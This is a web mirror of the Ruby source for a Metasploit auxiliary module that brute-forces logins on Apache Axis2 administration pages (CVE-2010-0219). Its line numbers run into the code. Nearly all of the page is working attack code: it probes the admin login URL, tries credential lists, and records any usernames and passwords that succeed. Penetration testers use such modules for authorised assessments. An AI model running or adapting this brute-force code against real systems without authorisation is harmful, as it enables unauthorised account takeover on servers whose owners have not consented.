CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/axis_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/login_scanner/axis2'6require 'metasploit/framework/credential_collection'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner131415def initialize16super(17'Name' => 'Apache Axis2 Brute Force Utility',18'Description' => %q{19This module attempts to login to an Apache Axis2 instance using20username and password combinations indicated by the USER_FILE,21PASS_FILE, and USERPASS_FILE options. It has been verified to22work on at least versions 1.4.1 and 1.6.2.23},24'Author' =>25[26'Leandro Oliveira <leandrofernando[at]gmail.com>'27],28'References' =>29[30[ 'CVE', '2010-0219' ],31[ 'OSVDB', '68662'],32],33'License' => MSF_LICENSE34)3536register_options( [37Opt::RPORT(8080),38OptString.new('TARGETURI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),39])40end4142# For print_* methods43def target_url44"http://#{vhost}:#{rport}#{datastore['URI']}"45end4647def run_host(ip)48uri = normalize_uri(target_uri.path)4950print_status("Verifying login exists at #{target_url}")51begin52send_request_cgi({53'method' => 'GET',54'uri' => uri55}, 20)56rescue => e57print_error("Failed to retrieve Axis2 login page at #{target_url}")58print_error("Error: #{e.class}: #{e}")59return60end6162print_status "#{target_url} - Apache Axis - Attempting authentication"6364cred_collection = build_credential_collection(65username: datastore['USERNAME'],66password: datastore['PASSWORD']67)6869scanner = Metasploit::Framework::LoginScanner::Axis2.new(70configure_http_login_scanner(71uri: uri,72cred_details: cred_collection,73stop_on_success: datastore['STOP_ON_SUCCESS'],74bruteforce_speed: datastore['BRUTEFORCE_SPEED'],75connection_timeout: 5,76http_username: datastore['HttpUsername'],77http_password: datastore['HttpPassword']78)79)8081scanner.scan! do |result|82credential_data = result.to_h83credential_data.merge!(84module_fullname: self.fullname,85workspace_id: myworkspace_id86)87case result.status88when Metasploit::Model::Login::Status::SUCCESSFUL89print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"90credential_core = create_credential(credential_data)91credential_data[:core] = credential_core92create_credential_login(credential_data)93:next_user94when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT95if datastore['VERBOSE']96print_brute :level => :verror, :ip => ip, :msg => "Could not connect"97end98invalidate_login(credential_data)99:abort100when Metasploit::Model::Login::Status::INCORRECT101if datastore['VERBOSE']102print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"103end104invalidate_login(credential_data)105end106end107108end109110111112end113114115